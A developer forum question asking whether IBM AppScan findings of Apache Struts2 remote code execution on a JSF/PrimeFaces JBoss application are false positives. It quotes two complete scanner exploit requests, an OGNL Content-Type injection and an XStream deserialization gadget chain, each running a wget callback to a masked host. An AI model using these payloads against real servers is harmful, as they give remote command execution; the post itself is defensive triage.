jboss7.x - IBM AppScan Struts2 issue reported on a JSF 2.2 & Primefaces - JBOSS 7.2 EAP

Question

We recently received result from IBM AppScan DAST and some of the result don't make much senses. The first 2 High issue shows the application as being Struts2 which is incorrect since it a JSF 2.2 , Primefaces 7.0.9 running on JBOSS EASP 7.2 (JSF version 2.3). I don't even seen Struts in JBOSS modules / jars.

1.High -- Apache Struts2 Remote Code Execution

Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents Fix: Upgrade to the latest version of Apache Struts

GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability

We were told we should check the Content-Type of request header. I have not come across any such in any of past DSAT. Has anyone done something like this before in JSF?

1.High -- Apache Struts2 REST Plugin XStream Remote Code Execution

POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>

Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability

Our web.xml has the error pages defined , client side state saving

<error-page>
        <error-code>404</error-code>
        <location>/error/404.xhtml</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <exception-type>java.lang.RuntimeException</exception-type>
        <location>/error/access.xhtml</location>
    </error-page>
    <error-page>
        <location>/error/error.xhtml</location>
    </error-page>

    <context-param>
        <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
        <param-value>client</param-value>
    </context-param>

Anyone who has seen similar issue from DSAT ? Could some of these be false positive? Looking for feedback and some insight.

Other Issue

• IBM AppScan - Blind SQL Injection (Time Based) - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Java Deserialization Code Execution - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Port Listener Command Injection - JSF 2.2 & Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Cross-Site Request Forgery - JSF 2.2 & Primefaces - JBOSS 7.2 EAP

Links CSRF, XSS and SQL Injection attack prevention in JSF

Answer 1

Waitting for answers